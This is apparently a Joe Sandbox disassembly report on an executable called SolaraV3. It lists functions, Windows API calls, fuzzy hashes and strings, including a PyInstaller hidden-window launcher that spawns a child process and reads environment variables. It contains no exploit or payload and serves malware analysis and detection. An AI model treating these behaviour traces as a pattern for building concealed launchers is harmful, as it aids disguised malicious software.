Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction ID: d8f8231e8349ab292ba8546ab0b2e6506ccfc607cb20df7be546b439c22b0af1
Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction Fuzzy Hash: 0311C471B18A8581DA208B69A82416DB361FB45FF4F545332EE7D877D9CE7CD0228700

Function 00007FF6DC71A948 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A95E
GetLastError.KERNEL32(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A968

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
Instruction ID: 0094c6eaa3d4d63496d20ff8e69808eeffa1c6b15ae0b44f8721ca82363fe342
Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
Instruction Fuzzy Hash: 2DE08C50F0920E43FF296BF6A86513C5651AF88B00F455036C80EC22A2EE2CA8A78710

Function 00007FF6DC71AB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00007FF6DC71A9D5,?,?,00000000,00007FF6DC71AA8A), ref: 00007FF6DC71ABC6
GetLastError.KERNEL32(?,?,?,00007FF6DC71A9D5,?,?,00000000,00007FF6DC71AA8A), ref: 00007FF6DC71ABD0

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction ID: 0c11eec4320f1b1e243678bd6dbc2af7e9d367a760fc7e2fddad315d07596af5
Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction Fuzzy Hash: 0821D811F1C68A41FAB157A994B037D12929F84BB0F18633BD92EC77D1CE6CE5634300

Function 00007FF6DC71BEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC71BED4

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction ID: c65993b15f576a6d6c905b041e5978778d586cff82d162d69b6a1a4842970028
Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction Fuzzy Hash: 9441E37291824987EA349B2DA56027D73A5EB59B90F142132EB9EC36D1CF3CE423CB50

Function 00007FFB0C396905 Relevance: 1.6, APIs: 1, Instructions: 353COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFB0C396A61

Memory Dump Source

Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true

Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 8461a2502f026d7e122df3db3e91d2553ea804ff5e6dd715b8e622b6a9c6ea1c
Instruction ID: 945ac33e8e9cad7e5493aa6e4d079119bdff1eaa15741d7b6c9c8a8b9e904895
Opcode Fuzzy Hash: 8461a2502f026d7e122df3db3e91d2553ea804ff5e6dd715b8e622b6a9c6ea1c
Instruction Fuzzy Hash: 4731B2F2A2A24286F7A49E35D54AE7D73B1EF40F84F544431EE0943699DF38E8828B00

Function 00007FF6DC707F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF6DC70803A

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 1a2b65ba27d9b07fa30d0be5417cb7ed185184055f80ad47060b652c762a0a3e
Instruction ID: 43ac1281434680340e6cfb263e4c3bcf2b72f214817af0faecd78219c4513109
Opcode Fuzzy Hash: 1a2b65ba27d9b07fa30d0be5417cb7ed185184055f80ad47060b652c762a0a3e
Instruction Fuzzy Hash: 4621F721B1865A46FA109B2368143FE9661BF45BD4F8C5432EE4C8B786CE7EE063C700

Function 00007FF6DC71B93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC71B9C2

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
Instruction ID: f8422d1c04b205098efb05b2fecd43552efd24ecbfcf616639df63dd37548e03
Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
Instruction Fuzzy Hash: 5D31A462A1861A85F7116F6D886137C2A94BF80BA0F522237E95D933D2CF7CE4678711

Function 00007FF6DC715F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC715EF9

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: 80008af62441f8f444589d6e03f262c18b15e8bfb9f3c72daf03557e33d7fd16
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: 33118731E1C64981FAA59F19942017DA368BF85B94F546433FB4CD7B96CF3DD4228700

Function 00007FF6DC726354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC726377

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction ID: f3a74f9fbda2858e96c7fdfd1565a5dba3ee2ddc81fea37d2288d50cdd7beae5
Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction Fuzzy Hash: 9921A432A18A4587EB719F58D45037DB7A0FB84B54F24423AEA9DC76DADF3CD4228B00

Function 00007FF6DC7103BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC710410

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: 6366436472c9eb8353529533f2eb0bfa139cdc9fdd466ed8a60788a2df9f1f45
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: B801C821A0874940E604DF5B995006DA695BF86FE0F5C5632DE6C97BD6CE3CE4238300

Function 00007FF6DC708E80 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6DC709390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6DC7045F4,00000000,00007FF6DC701985), ref: 00007FF6DC7093C9

LoadLibraryExW.KERNEL32(?,00007FF6DC706476,?,00007FF6DC70336E), ref: 00007FF6DC708EA2

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: ByteCharLibraryLoadMultiWide
String ID:
API String ID: 2592636585-0
Opcode ID: 11a4aaaef8a7a10f6e0ce37232ac144c9e9b59754371ad75d1a790c2d21c933d
Instruction ID: 64f6a83e57a3506b6fda1eae154b1f2b4289dcef3a941081d562d48aa679d09c
Opcode Fuzzy Hash: 11a4aaaef8a7a10f6e0ce37232ac144c9e9b59754371ad75d1a790c2d21c933d
Instruction Fuzzy Hash: EED0C201F3428942EA58A76BBA5663D9251AF89BC0F8CD036EE0D43B4ADC3CC0624B00

Function 00007FFB0C351CF8 Relevance: 1.3, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFB0C396A61

Memory Dump Source

Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true

Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 5563a82993f3f8e44ea2e202436c36dc659c7fe328bd3c98202d5b79c02492c4
Instruction ID: 47cf011dde15dc39fcdf87ab0e41da9159be3bec662161a287ae012b55f24998
Opcode Fuzzy Hash: 5563a82993f3f8e44ea2e202436c36dc659c7fe328bd3c98202d5b79c02492c4
Instruction Fuzzy Hash: 5431B0F2A2A24286E7A49F35D54AE7D73B1EF40B84F148431EE0947795CF3CE8828740

Function 00007FFB0C367EB0 Relevance: 1.3, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFB0C367EE1

Memory Dump Source

Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true

Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: f8a161ca16946112414120da3da362b423baedddf845a4f9c426056871324c08
Instruction ID: 2dc10d5821b7132051792e0c47bfbbf55dbfc9b0f42b08278e9affeceb42ba6e
Opcode Fuzzy Hash: f8a161ca16946112414120da3da362b423baedddf845a4f9c426056871324c08
Instruction Fuzzy Hash: A821ACB2B187808BD754DB26E584AADB3A0FB89B94F448135EF8C47B64CF78D455CB00

Function 00007FFB0C351F32 Relevance: 1.3, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFB0C36837B

Memory Dump Source

Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true

Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: d30e7c5704879f11d1e112ae6777e6cf3c1901bb9f2e947874565881c85a4ca2
Instruction ID: ea3a847ba3fdc5aafba4a9ae2bf5e12607c184f041d7267fa36297db3492f14a
Opcode Fuzzy Hash: d30e7c5704879f11d1e112ae6777e6cf3c1901bb9f2e947874565881c85a4ca2
Instruction Fuzzy Hash: 4EF06DA6A1878186D6009B26F404AAAA360EB88FC0F188031EE8D47BA9DF38C4818700

Function 00007FF6DC71D5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF6DC710C90,?,?,?,00007FF6DC7122FA,?,?,?,?,?,00007FF6DC713AE9), ref: 00007FF6DC71D63A

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction ID: 99ec219f8cf046e9289f3b5593592994e25866adea525afe5e7e9f8b82c70968
Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction Fuzzy Hash: D4F08210F0C20F45FE661775582527C12944FD47E0F082732DC2EC62C2DE3CA4A38910

Non-executed Functions

Function 00007FF6DC7089E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6DC709390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6DC7045F4,00000000,00007FF6DC701985), ref: 00007FF6DC7093C9

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708A3B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708A56

Part of subcall function 00007FF6DC71A47C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC71A490

Part of subcall function 00007FF6DC71871C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC718783

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708AE6
CreateProcessW.KERNEL32 ref: 00007FF6DC708B1E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708B28

Part of subcall function 00007FF6DC702C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6DC703706,?,00007FF6DC703804), ref: 00007FF6DC702C9E
Part of subcall function 00007FF6DC702C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6DC703706,?,00007FF6DC703804), ref: 00007FF6DC702D63
Part of subcall function 00007FF6DC702C50: MessageBoxW.USER32 ref: 00007FF6DC702D99

RegisterClassW.USER32 ref: 00007FF6DC708B80
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708B8B
CreateWindowExW.USER32 ref: 00007FF6DC708BD5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708BE7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708C02
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708C15
PeekMessageW.USER32 ref: 00007FF6DC708C39
TranslateMessage.USER32 ref: 00007FF6DC708C47
DispatchMessageW.USER32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708C51
PeekMessageW.USER32 ref: 00007FF6DC708C6C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708C7E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708C99
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708CAF
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708CB9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708CC7
DestroyWindow.USER32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708E04
GetExitCodeProcess.KERNEL32 ref: 00007FF6DC708E19
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708E22
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708E2F

Strings

CreateProcessW, xrefs: 00007FF6DC708B37
PyInstaller Onefile Hidden Window, xrefs: 00007FF6DC708B95
PyInstallerOnefileHiddenWindow, xrefs: 00007FF6DC708B54
Failed to create child process!, xrefs: 00007FF6DC708B30

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction ID: 1bff4179a1be7ff1bc58e4b5cef247cd99b3322a71b3d108e5b5ec61d38f45b0
Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction Fuzzy Hash: 94D18731A08B8A86EB209F75E8642AD7770FF84758F500237DA5E83A95DF3CD566D700

Function 00007FFB0B812671 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 168COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FFB0B9DF3D1
GetEnvironmentVariableW.KERNEL32 ref: 00007FFB0B9DF3F2
GetEnvironmentVariableW.KERNEL32 ref: 00007FFB0B9DF40D
GetEnvironmentVariableW.KERNEL32 ref: 00007FFB0B9DF428
GetEnvironmentVariableW.KERNEL32 ref: 00007FFB0B9DF470
WideCharToMultiByte.KERNEL32 ref: 00007FFB0B9DF4A6
WideCharToMultiByte.KERNEL32 ref: 00007FFB0B9DF4FB

Strings

USERPROFILE, xrefs: 00007FFB0B9DF3FE
RANDFILE, xrefs: 00007FFB0B9DF3B9
HOME, xrefs: 00007FFB0B9DF3E0
.rnd, xrefs: 00007FFB0B9DF5AA
SYSTEMROOT, xrefs: 00007FFB0B9DF419

Memory Dump Source

